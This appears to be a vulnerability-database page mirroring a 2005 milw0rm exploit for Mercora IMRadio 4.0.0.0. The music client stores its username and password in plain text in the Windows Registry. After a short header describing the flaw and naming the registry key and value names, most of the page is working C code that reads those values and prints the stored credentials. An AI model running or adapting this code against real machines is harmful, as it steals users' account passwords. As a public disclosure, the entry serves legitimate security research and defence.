Lucene search
K

Mercora IMRadio <= 4.0.0.0 - Local Password Disclosure Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 15 Views

Mercora IMRadio 4.0.0.0 plain text password storage in Windows Registr

Code

                                                /*================================================================

Mercora IMRadio 4.0.0.0 password disclosure local exploit by Kozan

Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.spyinstructors.com
Mail: [email protected]

=====[ Application ]==============================================

Application: Mercora IMRadio 4.0.0.0 (and probably prior versions)
Vendor: www.mercora.com

=====[ Introduction ]=============================================

Search, listen, and record any music. With over 2.5 million unique
tracks, Mercora is a legal music radio network powered by people,
DJs, and artists just like you. Mercora combines Internet streaming,
country-specific copyright compliance, and social networking
technologies to create the next generation of digital music.
Version 4.0 supports friends and family listening, a vastly
simplified interface, customized listening, and live music search.

=====[ Bug ]======================================================

Mercora IMRadio 4.0.0.0 stores username and passwords in the Windows
Registry in plain text. A local user can read the values.

HKEY_CURRENT_USER\Software\Mercora\MercoraClient\Profiles
Auto.Username = Mercora IMRadio Username
Auto.Password = Mercora IMRadio Password

=====[ Vendor Confirmed ]=========================================

No

=====[ Fix ]======================================================

There is no solution at the time of this entry.

================================================================*/

#include &#60;stdio.h&#62;
#include &#60;windows.h&#62;
#define BUF 100

int main()
{
       HKEY hKey;
       char Username[BUF], Password[BUF];
       DWORD dwBUFLEN = BUF;
       LONG lRet;

       if( RegOpenKeyEx(HKEY_CURRENT_USER,
                                       &#34;Software\\Mercora\\MercoraClient\\Profiles&#34;,
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey
                                       ) == ERROR_SUCCESS )
       {
               lRet = RegQueryValueEx(hKey, &#34;Auto.Password&#34;, NULL, NULL, (LPBYTE)Password, &dwBUFLEN);
               if (lRet != ERROR_SUCCESS || dwBUFLEN &#62; BUF) strcpy(Password,&#34;Not Found!&#34;);

               lRet = RegQueryValueEx(hKey, &#34;Auto.Username&#34;, NULL, NULL, (LPBYTE)Username, &dwBUFLEN);
               if (lRet != ERROR_SUCCESS || dwBUFLEN &#62; BUF) strcpy(Username,&#34;Not Found!&#34;);

               RegCloseKey(hKey);

               fprintf(stdout, &#34;Mercora IMRadio 4.0.0.0 password disclosure local exploit by Kozan\n&#34;);
               fprintf(stdout, &#34;Credits to ATmaCA\n&#34;);
               fprintf(stdout, &#34;www.spyinstructors.com \n&#34;);
               fprintf(stdout, &#34;[email protected]\n\n&#34;);
               fprintf(stdout, &#34;Username :\t%s\n&#34;,Username);
               fprintf(stdout, &#34;Password :\t%s\n&#34;,Password);
       }
       else
       {
               fprintf(stderr, &#34;Mercora IMRadio 4.0.0.0 is not installed on your system!\n&#34;);
       }

       return 0;
}

// milw0rm.com [2005-08-22]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
15